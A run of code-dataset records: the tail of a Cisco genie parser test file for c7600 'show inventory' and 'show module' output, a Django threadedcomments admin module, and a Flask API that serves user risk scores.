Supervisor Engine 720 Rev. 4.1\"\n PID: WS-SUP720-3BXL , VID: V11, SN: SAD09020BF8\n\n NAME: \"msfc sub-module of 5\", DESCR: \"WS-SUP720 MSFC3 Daughterboard Rev. 2.2\"\n PID: WS-SUP720 , VID: , SN: SAD090105M6\n\n NAME: \"switching engine sub-module of 5\", DESCR: \"WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.4\"\n PID: WS-F6K-PFC3BXL , VID: , SN: SAD090301K6\n\n NAME: \"module 6\", DESCR: \"WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 
5.12\"\n PID: WS-SUP720-3BXL , VID: V11, SN: SAL15129MRC\n\n NAME: \"msfc sub-module of 6\", DESCR: \"WS-SUP720 MSFC3 Daughterboard Rev. 5.1\"\n PID: WS-SUP720 , VID: , SN: SAL15045PYS\n\n NAME: \"switching engine sub-module of 6\", DESCR: \"WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.11\"\n PID: WS-F6K-PFC3BXL , VID: V02, SN: SAL15129KW4\n\n NAME: \"PS 1 PWR-1900-AC/6\", DESCR: \"AC_6 power supply, 1900 watt 1\"\n PID: PWR-1900-AC/6 , VID: V02, SN: DCA1104401B\n\n NAME: \"PS 2 PWR-1900-AC/6\", DESCR: \"AC_6 power supply, 1900 watt 2\"\n PID: PWR-1900-AC/6 , VID: V02, SN: DCA11044011\n\n '''}\n\n parsed_output = {\n 'index': {\n 1: {\n 'descr': 'Cisco Systems Cisco 7600 6-slot Chassis System',\n 'name': 'CISCO7606',\n 'pid': 'CISCO7606',\n 'sn': 'FOX11140RN8',\n },\n 2: {\n 'descr': 'OSR-7600 Clock FRU 1',\n 'name': 'CLK-7600 1',\n 'pid': 'CLK-7600',\n 'sn': 'NWG1112014W',\n },\n 3: {\n 'descr': 'OSR-7600 Clock FRU 2',\n 'name': 'CLK-7600 2',\n 'pid': 'CLK-7600',\n 'sn': 'NWG1112014W',\n },\n 4: {\n 'descr': 'WS-X6748-GE-TX CEF720 48 port 10/100/1000mb Ethernet Rev. 2.7',\n 'name': 'module 1',\n 'pid': 'WS-X6748-GE-TX',\n 'sn': 'SAL1209HMW3',\n 'vid': 'V02',\n },\n 5: {\n 'descr': 'WS-F6700-CFC Centralized Forwarding Card Rev. 4.0',\n 'name': 'switching engine sub-module of 1',\n 'pid': 'WS-F6700-CFC',\n 'sn': 'SAL1207G5V1',\n 'vid': 'V05',\n },\n 6: {\n 'descr': '2 port adapter Enhanced FlexWAN Rev. 2.1',\n 'name': 'module 2',\n 'pid': 'WS-X6582-2PA',\n 'sn': 'JAE0939LYNQ',\n 'vid': 'V06',\n },\n 7: {\n 'descr': 'Serial Port Adapter',\n 'name': 'module 2/1',\n 'pid': 'PA-4T+',\n 'sn': '32861325',\n },\n 8: {\n 'descr': 'WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 4.1',\n 'name': 'module 5',\n 'pid': 'WS-SUP720-3BXL',\n 'sn': 'SAD09020BF8',\n 'vid': 'V11',\n },\n 9: {\n 'descr': 'WS-SUP720 MSFC3 Daughterboard Rev. 2.2',\n 'name': 'msfc sub-module of 5',\n 'pid': 'WS-SUP720',\n 'sn': 'SAD090105M6',\n },\n 10: {\n 'descr': 'WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.4',\n 'name': 'switching engine sub-module of 5',\n 'pid': 'WS-F6K-PFC3BXL',\n 'sn': 'SAD090301K6',\n },\n 11: {\n 'descr': 'WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 5.12',\n 'name': 'module 6',\n 'pid': 'WS-SUP720-3BXL',\n 'sn': 'SAL15129MRC',\n 'vid': 'V11',\n },\n 12: {\n 'descr': 'WS-SUP720 MSFC3 Daughterboard Rev. 5.1',\n 'name': 'msfc sub-module of 6',\n 'pid': 'WS-SUP720',\n 'sn': 'SAL15045PYS',\n },\n 13: {\n 'descr': 'WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 
1.11',\n 'name': 'switching engine sub-module of 6',\n 'pid': 'WS-F6K-PFC3BXL',\n 'sn': 'SAL15129KW4',\n 'vid': 'V02',\n },\n 14: {\n 'descr': 'AC_6 power supply, 1900 watt 1',\n 'name': 'PS 1 PWR-1900-AC/6',\n 'pid': 'PWR-1900-AC/6',\n 'sn': 'DCA1104401B',\n 'vid': 'V02',\n },\n 15: {\n 'descr': 'AC_6 power supply, 1900 watt 2',\n 'name': 'PS 2 PWR-1900-AC/6',\n 'pid': 'PWR-1900-AC/6',\n 'sn': 'DCA11044011',\n 'vid': 'V02',\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowInventory(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowInventory(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowModule(unittest.TestCase):\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Mod Ports Card Type Model Serial No.\n --- ----- -------------------------------------- ------------------ -----------\n 1 48 CEF720 48 port 10/100/1000mb Ethernet WS-X6748-GE-TX SAL1209HMW3\n 2 0 2 port adapter Enhanced FlexWAN WS-X6582-2PA JAE0939LYNQ\n 5 2 Supervisor Engine 720 (Hot) WS-SUP720-3BXL SAD09020BF8\n 6 2 Supervisor Engine 720 (Active) WS-SUP720-3BXL SAL15129MRC\n\n Mod MAC addresses Hw Fw Sw Status\n --- ---------------------------------- ----- ------------- ------------ -------\n 1 001e.4aff.ee89 to 001e.4aff.eeb8 2.7 12.2(14r)S 15.4(0.10) Ok\n 2 0015.2bff.e884 to 0015.2bff.e8c3 2.1 15.4(0.10)S 15.4(0.10)S Ok\n 5 0011.21ff.441a to 0011.21ff.441d 4.1 8.1(3 15.4(0.10) Ok\n 6 0022.55ff.039b to 0022.55ff.039e 5.12 8.5(4 15.4(0.10) Ok\n\n Mod Sub-Module Model Serial Hw Status\n ---- --------------------------- ------------------ ----------- ------- -------\n 1 Centralized Forwarding Card WS-F6700-CFC SAL1207G5V1 4.0 Ok\n 5 Policy Feature Card 3 WS-F6K-PFC3BXL SAD090301K6 1.4 Ok\n 5 MSFC3 Daughterboard WS-SUP720 SAD090105M6 2.2 Ok\n 6 Policy Feature Card 3 WS-F6K-PFC3BXL SAL15129KW4 1.11 Ok\n 6 MSFC3 Daughterboard WS-SUP720 SAL15045PYS 5.1 Ok\n\n Mod Online Diag Status\n ---- -------------------\n 1 Pass\n 2 Pass\n 5 Pass\n 6 Pass\n '''}\n\n parsed_output = {\n 'slot': {\n '1': {\n 'lc': {\n 'card_type': 'CEF720 48 port 10/100/1000mb Ethernet',\n 'fw_ver': '12.2(14r)S',\n 'hw_ver': '2.7',\n 'mac_address_from': '001e.4aff.ee89',\n 'mac_address_to': '001e.4aff.eeb8',\n 'model': 'WS-X6748-GE-TX',\n 'online_diag_status': 'Pass',\n 'ports': 48,\n 'serial_number': 'SAL1209HMW3',\n 'status': 'Ok',\n 'subslot': {\n 'WS-F6700-CFC': {\n 'hw_ver': '4.0',\n 'model': 'WS-F6700-CFC',\n 'serial_number': 'SAL1207G5V1',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n '2': {\n 'lc': {\n 'card_type': '2 port adapter Enhanced FlexWAN',\n 'fw_ver': '15.4(0.10)S',\n 'hw_ver': '2.1',\n 'mac_address_from': '0015.2bff.e884',\n 'mac_address_to': '0015.2bff.e8c3',\n 'model': 'WS-X6582-2PA',\n 'online_diag_status': 'Pass',\n 'ports': 0,\n 'serial_number': 'JAE0939LYNQ',\n 'status': 'Ok',\n 'sw_ver': '15.4(0.10)S',\n },\n },\n '5': {\n 'rp': {\n 'card_type': 'Supervisor Engine 720 (Hot)',\n 'fw_ver': '8.1(3',\n 'hw_ver': '4.1',\n 'mac_address_from': '0011.21ff.441a',\n 'mac_address_to': '0011.21ff.441d',\n 'model': 'WS-SUP720-3BXL',\n 'online_diag_status': 'Pass',\n 'ports': 2,\n 'serial_number': 'SAD09020BF8',\n 'status': 'Ok',\n 'subslot': 
{\n 'WS-F6K-PFC3BXL': {\n 'hw_ver': '1.4',\n 'model': 'WS-F6K-PFC3BXL',\n 'serial_number': 'SAD090301K6',\n 'status': 'Ok',\n },\n 'WS-SUP720': {\n 'hw_ver': '2.2',\n 'model': 'WS-SUP720',\n 'serial_number': 'SAD090105M6',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n '6': {\n 'rp': {\n 'card_type': 'Supervisor Engine 720 (Active)',\n 'fw_ver': '8.5(4',\n 'hw_ver': '5.12',\n 'mac_address_from': '0022.55ff.039b',\n 'mac_address_to': '0022.55ff.039e',\n 'model': 'WS-SUP720-3BXL',\n 'online_diag_status': 'Pass',\n 'ports': 2,\n 'serial_number': 'SAL15129MRC',\n 'status': 'Ok',\n 'subslot': {\n 'WS-F6K-PFC3BXL': {\n 'hw_ver': '1.11',\n 'model': 'WS-F6K-PFC3BXL',\n 'serial_number': 'SAL15129KW4',\n 'status': 'Ok',\n },\n 'WS-SUP720': {\n 'hw_ver': '5.1',\n 'model': 'WS-SUP720',\n 'serial_number': 'SAL15045PYS',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowModule(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowModule(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nif __name__ == '__main__':\n unittest.main()", "sub_path": "src/genie/libs/parser/ios/c7600/tests/test_show_platform.py", "file_name": "test_show_platform.py", "file_ext": "py", "file_size_in_byte": 26025, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 17, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowVersion", "line_number": 123, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 124, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 129, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowVersion", "line_number": 130, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 135, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 184, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.Dir", "line_number": 185, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 186, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 191, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.Dir", "line_number": 192, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 198, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 199, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 280, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowRedundancy", "line_number": 281, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 282, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", 
"line_number": 287, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowRedundancy", "line_number": 288, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 294, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 295, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 449, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowInventory", "line_number": 450, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 451, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 456, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowInventory", "line_number": 457, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 461, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 462, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 463, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 598, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowModule", "line_number": 599, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 600, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 605, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowModule", "line_number": 606, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 611, "usage_type": "call"}]} +{"seq_id": "411620587", "text": "from django.contrib import admin\nfrom django.contrib.comments.models import Comment\nfrom django.contrib.comments.admin import CommentsAdmin\nfrom threadedcomments import get_model\nfrom django.utils.translation import ugettext_lazy as _\nfrom threadedcomments.models import ThreadedComment\n\ndef remove_comment(modeladmin, request, queryset):\n queryset.update(is_removed=True)\n\ndef un_remove_comment(modeladmin, request, queryset):\n queryset.update(is_removed=False)\n\ndef public_comment(modeladmin, request, queryset):\n queryset.update(is_public=True)\n\ndef un_public_comment(modeladmin, request, queryset):\n queryset.update(is_public=False)\n\n\nremove_comment.short_description = _(\"Mark selected comments as removed\")\nun_remove_comment.short_description = _(\"Mark selected comments as not removed\")\npublic_comment.short_description = _(\"Mark selected comments as published\")\nun_public_comment.short_description = _(\"Mark selected comments as unpublished\")\nCommentsAdmin.actions.append(remove_comment)\nCommentsAdmin.actions.append(un_remove_comment)\nCommentsAdmin.actions.append(public_comment)\nCommentsAdmin.actions.append(un_public_comment)\n\nif get_model() is ThreadedComment:\n if Comment in admin.site._registry:\n admin.site.unregister(Comment)\n admin.site.register(Comment, CommentsAdmin)\n", "sub_path": "threadedcomments/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.utils.translation.ugettext_lazy", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": 
"django.utils.translation.ugettext_lazy", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 28, "usage_type": "name"}, {"api_name": "threadedcomments.get_model", "line_number": 30, "usage_type": "call"}, {"api_name": "threadedcomments.models.ThreadedComment", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.admin.site", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.unregister", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 32, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "113252127", "text": "from flask_restplus import Namespace, Resource, fields, reqparse\nfrom utils import ResourceException, output_json\nfrom flask import g as request_context, request, jsonify\nimport ah_datadog\nimport datadog\nimport logging\nimport time\n\nfrom modeling.misc.experiment import UserExperiment\nfrom modeling.misc.predictor import Predictor\nfrom modeling.model.identityrisk import *\nfrom modeling.model.activation.ActivationRiskModel import ActivationRiskModel\nfrom modeling.model.max_adjustment.MaxAdjustmentModel import MaxAdjustmentModel\nfrom modeling.model.newuser.NewUserRiskModel import NewUserRiskModel\nfrom modeling.model.restore.RestoreModel import RestoreModel\n\n\napi = Namespace('risk')\nlogger = 
logging.getLogger(\"ah.risk\")\n\nsimple_response_model = api.model('Response', {\n    'Message': fields.String,\n    'Status': fields.Integer\n    })\n\n\n@api.route(\"/activation/<int:user_id>\")\n@api.doc(params={'user_id': fields.Integer})\nclass Activation(Resource):\n    @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:activation\"])\n    @api.response(200, 'Success', simple_response_model)\n    def get(self, user_id):\n        datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:activation\"])\n        uid = _validate_user_id(user_id)\n        logger.info(\"activation():\")\n\n        result = {'userId': uid}\n\n        # Pass the test uid successfully for alert tests:\n        if uid in [0, '0']:\n            return\n\n        try:\n\n            model = ActivationRiskModel()\n            fg = model.getAllFeatures(uid)\n            predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n            try:\n                score = predictor.getScore()\n            except:\n                datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n                                         tags=[\"operation:activation_prediction\"])\n                logger.exception('Activation Risk scoring default -1 assigned')\n                score = -1\n\n            if score >= 0:\n                reasonCode = predictor.getReasonCode()\n            else:\n                reasonCode = predictor.getReasonCodeForNegativeOne()\n                logger.debug('Activation Risk scoring default -1 assigned, reasonCode: %s', reasonCode)\n\n            result['score'] = score\n            result['reasonCode'] = reasonCode\n\n            return jsonify(result)\n\n        except:\n            logger.exception('Request failed')\n            datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:activation\"])\n            raise ResourceException('request of activation risk failure, userid = %s.' % user_id)\n\n\n@api.route(\"/identity/<int:user_id>\")\n@api.doc(params={'user_id': fields.Integer})\nclass Identity(Resource):\n    @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:identity\"])\n    @api.response(200, 'Success', simple_response_model)\n    def get(self, user_id):\n        datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:identity\"])\n        uid = _validate_user_id(user_id)\n        logger.info(\"identity():\")\n\n        # Pass the test uid successfully for alert tests:\n        if uid in [0, '0']:\n            return\n\n        try:\n            r = checkIdentity(uid)\n\n            json_string = jsonify(r.toDict())\n        except Exception:\n            logger.exception('request of identity risk failed')\n            datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:identity\"])\n            raise ResourceException('request of identity risk failure, userid = %s.' % user_id)\n\n        return json_string\n\n\n@api.route(\"/max_adjustment/<int:user_id>\")\n@api.doc(params={'user_id': fields.Integer})\nclass MaxAdjustment(Resource):\n    @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:max_adjustment\"])\n    @api.response(200, 'Success', simple_response_model)\n    def get(self, user_id):\n        datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:max_adjustment\"])\n        uid = _validate_user_id(user_id)\n        logger.info(\"max_adjustment():\")\n\n        result = {'userId': uid}\n\n        # Pass the test uid successfully for alert tests:\n        if uid in [0, '0']:\n            return\n\n        try:\n            t0 = time.time()\n            model = MaxAdjustmentModel()\n            fg = model.getAllFeatures(uid)\n\n
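            # experiment 67 splits traffic: users in group 2 are scored with the lightgbm model, everyone else with the logistic regression model\n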
            # Model with new features\n            eid = 67\n            modelExp = UserExperiment()\n            modelExpid = modelExp.getUserGroup(uid, eid)\n\n            t1 = time.time()\n            # lightgbm model\n            if modelExpid == 2:\n                predictor = lightgbm_model(fg, model)\n            else:\n                predictor = logistic_regression_model(fg, model)\n\n            try:\n                score = predictor.getScore()\n                if modelExpid == 2:\n                    logger.info('lightgbm prediction response time is %s', (time.time() - t1))\n                    logger.info('lightgbm total response time is %s', (time.time() - t0))\n                else:\n                    logger.info('logistic regression prediction response time is %s', (time.time() - t1))\n                    logger.info('logistic regression total response time is %s', (time.time() - t0))\n            except:\n                logger.exception(\"default score -1 assigned\")\n                model_name = \"lightgbm\" if modelExpid == 2 else \"logisticRegression\"\n                datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n                                         tags=[\"operation:max_adjustment_prediction\",\n                                               \"model:%s\" % model_name])\n                score = -1\n\n            if modelExpid == 2:\n                reasonCode = []\n                reasonCat = []\n                logger.info('risk score = %s, reasonCode = lightgbm', score)\n            else:\n                if score >= 0:\n                    reasonCode = predictor.getReasonCode()\n                    reasonCat = predictor.getReasonCategory()\n                    logger.info('risk score = %s, reasonCode = %s', score, reasonCode)\n                else:\n                    reasonCode = predictor.getReasonCodeForNegativeOne()\n                    reasonCat = []\n                    logger.error('risk score = %s, reasonCode = %s', score, reasonCode)\n\n            weightedTipRate = predictor.getTipRate()\n            totalAmount = predictor.getTotalAmount()\n            avgPayrollAmount = predictor.getAvgPayroll()\n\n            # try:\n            #     predictor.__writeDB__('max_adjustment', connection, fg.f)\n            # except:\n            #     log.error(\"Max adjustmentRisk writing db (%s)(%s) \"\n            #               \"(userid = %s):%s\" %\n            #               (request.remote_addr, contextid,\n            #                userid, traceback.format_exc()))\n\n            result['score'] = score\n            result['reasonCode'] = reasonCode\n            result['weightedTipRate'] = weightedTipRate\n            result['totalAmount'] = totalAmount\n            result['reasonCategory'] = reasonCat\n            result['avgPayrollAmount'] = avgPayrollAmount\n\n            logger.debug('Returned json: %s', result)\n            return jsonify(result)\n\n        except:\n            logger.exception('Max adjustment risk score request failed')\n            datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:max_adjustment\"])\n            raise ResourceException('request of max adjustment risk failure, userid = %s.' % user_id)\n\n\n
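# NOTE: unlike the endpoints above, a scoring failure in NewUser falls back to a default score of 10; scores above 1 are treated as the error case below.\n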
@api.route(\"/new_user/<int:user_id>\")\n@api.doc(params={'user_id': fields.Integer})\nclass NewUser(Resource):\n    @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:new_user\"])\n    @api.response(200, 'Success', simple_response_model)\n    def get(self, user_id):\n        datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:new_user\"])\n        uid = _validate_user_id(user_id)\n        logger.info(\"new_user():\")\n\n        result = {'userId': uid}\n\n        # Pass the test uid successfully for alert tests:\n        if uid in [0, '0']:\n            return\n\n        try:\n            model = NewUserRiskModel()\n            fg = model.getAllFeatures(uid)\n            predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n            try:\n                score = predictor.getScore()\n            except:\n                logger.warning('Default score 10 assigned')\n                datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n                                         tags=[\"operation:new_user_prediction\"])\n                score = 10\n\n            if score <= 1:\n                reasonCode = predictor.getReasonCode()\n                logger.info('risk score = %s, reasonCode = %s',\n                            score, reasonCode)\n            else:\n                reasonCode = predictor.getReasonCodeForNegativeOne()\n                logger.error('risk score = %s, reasonCode = %s',\n                             score, reasonCode)\n\n            result['score'] = score\n            result['reasonCode'] = reasonCode\n\n            return jsonify(result)\n\n        except Exception:\n            logger.exception('Request failed')\n            datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:new_user\"])\n            raise ResourceException('request of new user risk failure, userid = %s.' % user_id)\n        finally:\n            logger.info('end of request')\n\n\n@api.route(\"/restore/<int:user_id>\")\n@api.doc(params={'user_id': fields.Integer})\nclass Restore(Resource):\n    @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:restore\"])\n    @api.response(200, 'Success', simple_response_model)\n    def get(self, user_id):\n        datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:restore\"])\n        uid = _validate_user_id(user_id)\n        logger.info(\"restore():\")\n\n        result = {'userId': uid}\n\n        # Pass the test uid successfully for alert tests:\n        if uid in [0, '0']:\n            return\n\n        try:\n            model = RestoreModel()\n            fg = model.getAllFeatures(uid)\n            predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n            try:\n                score = predictor.getScore()\n            except:\n                logger.exception('Default score -1 assigned')\n                datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n                                         tags=[\"operation:restore_prediction\"])\n                score = -1\n\n            if score >= 0:\n                reasonCode = predictor.getReasonCode()\n                logger.info('risk score = %s, reasonCode = %s',\n                            score, reasonCode)\n            else:\n                reasonCode = predictor.getReasonCodeForNegativeOne()\n                logger.error('risk score = %s, reasonCode = %s',\n                             score, reasonCode)\n\n            weightedTipRate = predictor.getTipRate()\n            totalAmount = predictor.getTotalAmount()\n            avgPayrollAmount = predictor.getAvgPayroll()\n\n            result['score'] = score\n            result['reasonCode'] = reasonCode\n            result['weightedTipRate'] = weightedTipRate\n            result['totalAmount'] = totalAmount\n            result['avgPayrollAmount'] = avgPayrollAmount\n\n            return jsonify(result)\n\n        except:\n            logger.exception('Request failed')\n            datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:restore\"])\n            raise ResourceException('request of restore risk failure, userid = %s.' 
% user_id)\n\n\n@ah_datadog.datadog_timed(name=\"model.timing\", tags=[\"operation:lightgbm\"])\ndef lightgbm_model(fg, model):\n filename_lgb = 'lightgbm.pkl'\n predictor = Predictor(fg.f, filename=filename_lgb, filepath=model.pkl_path)\n return predictor\n\n\n@ah_datadog.datadog_timed(name=\"model.timing\", tags=[\"operation:logisticRegression\"])\ndef logistic_regression_model(fg, model):\n filename_old = 'old_logisticRegression.pkl'\n predictor = Predictor(fg.f, filename=filename_old, filepath=model.pkl_path)\n return predictor\n\n# helper function for validating IDs\ndef _validate_user_id(user_id):\n try:\n request_context.extras['UserId'] = user_id\n return int(user_id)\n except ValueError:\n raise ResourceException('invalid userid %s (integer expected)' % user_id, status_code=400)\n\n\n", "sub_path": "src/resources/risk.py", "file_name": "risk.py", "file_ext": "py", "file_size_in_byte": 12565, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_restplus.Namespace", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_restplus.fields.String", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 22, "usage_type": "name"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 29, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 33, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 33, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 33, "usage_type": "call"}, {"api_name": "modeling.model.activation.ActivationRiskModel.ActivationRiskModel", "line_number": 45, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 47, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 52, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 52, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 66, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 70, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 70, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 71, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 30, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 28, "usage_type": "attribute"}, {"api_name": 